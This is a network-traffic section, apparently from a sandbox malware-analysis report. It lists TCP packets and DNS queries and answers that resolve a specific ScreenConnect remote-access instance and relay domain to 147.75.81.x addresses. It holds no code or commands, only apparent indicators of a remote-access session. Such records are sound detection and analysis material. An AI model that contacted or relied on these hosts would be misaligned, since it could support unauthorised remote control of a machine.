                                                                                                                                                                                                                                        Dec 20, 2024 18:23:07.962213993 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:07.962223053 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:07.962378025 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.081904888 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.081924915 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.082015991 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.082031012 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.082076073 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.104310036 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.104326010 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.104389906 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.104399920 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.104440928 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.130060911 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.130076885 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.130151987 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.130166054 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.131320000 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.155647039 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.155662060 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.155721903 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.155730009 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.155781984 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.177870035 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.177886009 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.177953005 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.177962065 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.179086924 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.203547001 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.203562975 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.203629971 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.203640938 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.203668118 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.203695059 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.229115009 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.229130030 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.229197979 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.229209900 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.231867075 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.252378941 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.252393961 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.252453089 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.252460957 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.252547979 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.269051075 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.269064903 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.269135952 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.269145012 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.269270897 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.285725117 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.285739899 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.285784960 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.285793066 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.285851955 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.301219940 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.301234961 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.301285028 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.301295996 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.301455975 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.313971996 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.313987970 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.314050913 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.314059019 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.314116955 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.324692965 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.324707985 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.324765921 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.324774981 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.325129986 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.333678961 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.333693981 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.333745956 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.333753109 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.333784103 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.341449022 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.341464043 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.341520071 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.341532946 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.341658115 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.351011992 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.351027966 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.351109028 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.351124048 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.351165056 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.358854055 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.358870029 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.358930111 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.358938932 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.359045029 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.367837906 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.367851019 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.367928028 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.367938995 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.368758917 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.376943111 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.376959085 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.377003908 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.377018929 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.377053022 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.377074003 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.384684086 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.384702921 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.384737968 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.384746075 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.384778976 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.441063881 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.441086054 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.441171885 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.441195965 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.444161892 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.447504997 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.447524071 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.447592974 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.447602034 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.447722912 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.453619957 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.453641891 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.453705072 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.453718901 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.453835964 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.458713055 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.458730936 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.458789110 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.458797932 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.458885908 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.464113951 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.464129925 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.464185953 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.464193106 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.464219093 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.464231014 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.469165087 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.469178915 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.469244003 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.469252110 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.469352961 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.472007036 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.472063065 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.472075939 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.472079992 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.472426891 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.472443104 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.501306057 CET49798443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.501347065 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.501486063 CET49798443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.501791000 CET49798443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.501805067 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:09.863460064 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:09.865106106 CET49798443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:09.865134954 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.574423075 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.574444056 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.574539900 CET49798443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.574552059 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.574624062 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.574676037 CET49798443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.574682951 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.620328903 CET49798443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.631881952 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.631892920 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.631937027 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.631961107 CET49798443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.631974936 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.632023096 CET49798443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.772957087 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.772974968 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.773091078 CET49798443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.773112059 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.773161888 CET49798443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.806766033 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.806783915 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.806839943 CET49798443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.806855917 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.806890965 CET49798443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.811609030 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.811674118 CET44349798147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.811676979 CET49798443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.811716080 CET49798443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:10.815258026 CET49798443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:15.591644049 CET49813443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:15.591712952 CET44349813147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:15.591888905 CET49813443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:16.313460112 CET49813443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:16.313502073 CET44349813147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:16.313601017 CET44349813147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:18.382774115 CET49820443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:18.382831097 CET44349820147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:18.382914066 CET49820443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:18.384954929 CET49820443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:18.384968996 CET44349820147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:18.384994030 CET44349820147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:20.967824936 CET49826443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:20.967921019 CET44349826147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:20.968024015 CET49826443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:20.969971895 CET49826443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:20.970012903 CET44349826147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:20.970110893 CET44349826147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:25.496632099 CET49838443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:25.496712923 CET44349838147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:25.496798038 CET49838443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:25.498853922 CET49838443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:25.498886108 CET44349838147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:25.498934984 CET44349838147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:31.034445047 CET49852443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:31.034543037 CET44349852147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:31.034673929 CET49852443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:31.037538052 CET49852443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:31.037617922 CET44349852147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:31.037667036 CET44349852147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:40.368047953 CET49874443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:40.368136883 CET44349874147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:40.368220091 CET49874443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:40.372632027 CET49874443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:40.372669935 CET44349874147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:40.372704029 CET44349874147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:53.233155966 CET49905443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:53.233226061 CET44349905147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:53.233300924 CET49905443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:53.235912085 CET49905443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:53.235940933 CET44349905147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:53.235996962 CET44349905147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:24:09.503200054 CET49941443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:24:09.503248930 CET44349941147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:24:09.503319025 CET49941443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:24:09.507076979 CET49941443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:24:09.507096052 CET44349941147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:24:09.507163048 CET44349941147.75.81.4192.168.2.5

                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:26.586549997 CET6419153192.168.2.51.1.1.1
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:26.899703026 CET53641911.1.1.1192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.737891912 CET5377053192.168.2.51.1.1.1
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.943176031 CET53537701.1.1.1192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:01.810013056 CET5492853192.168.2.51.1.1.1
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:02.120120049 CET53549281.1.1.1192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:15.274945021 CET4918053192.168.2.51.1.1.1
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:15.559389114 CET53491801.1.1.1192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:52.910103083 CET6347153192.168.2.51.1.1.1
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:53.213187933 CET53634711.1.1.1192.168.2.5

                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:26.586549997 CET192.168.2.51.1.1.10x4ae8Standard query (0)koidesfac.screenconnect.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.737891912 CET192.168.2.51.1.1.10x3ec9Standard query (0)koidesfac.screenconnect.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:01.810013056 CET192.168.2.51.1.1.10x43aStandard query (0)koidesfac.screenconnect.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:15.274945021 CET192.168.2.51.1.1.10x3ae9Standard query (0)instance-l7g4dh-relay.screenconnect.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:52.910103083 CET192.168.2.51.1.1.10x786fStandard query (0)instance-l7g4dh-relay.screenconnect.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:26.899703026 CET1.1.1.1192.168.2.50x4ae8No error (0)koidesfac.screenconnect.comserver-nixd2d85b70-web.screenconnect.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:26.899703026 CET1.1.1.1192.168.2.50x4ae8No error (0)server-nixd2d85b70-web.screenconnect.com147.75.81.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:33.358398914 CET1.1.1.1192.168.2.50xc5ecNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:33.358398914 CET1.1.1.1192.168.2.50xc5ecNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:34.577539921 CET1.1.1.1192.168.2.50x818dNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:34.577539921 CET1.1.1.1192.168.2.50x818dNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.943176031 CET1.1.1.1192.168.2.50x3ec9No error (0)koidesfac.screenconnect.comserver-nixd2d85b70-web.screenconnect.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 20, 2024 18:22:56.943176031 CET1.1.1.1192.168.2.50x3ec9No error (0)server-nixd2d85b70-web.screenconnect.com147.75.81.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:02.120120049 CET1.1.1.1192.168.2.50x43aNo error (0)koidesfac.screenconnect.comserver-nixd2d85b70-web.screenconnect.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:02.120120049 CET1.1.1.1192.168.2.50x43aNo error (0)server-nixd2d85b70-web.screenconnect.com147.75.81.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:15.559389114 CET1.1.1.1192.168.2.50x3ae9No error (0)instance-l7g4dh-relay.screenconnect.comserver-nixd2d85b70-relay.screenconnect.comCNAME (Canonical name)IN (0x0001)false
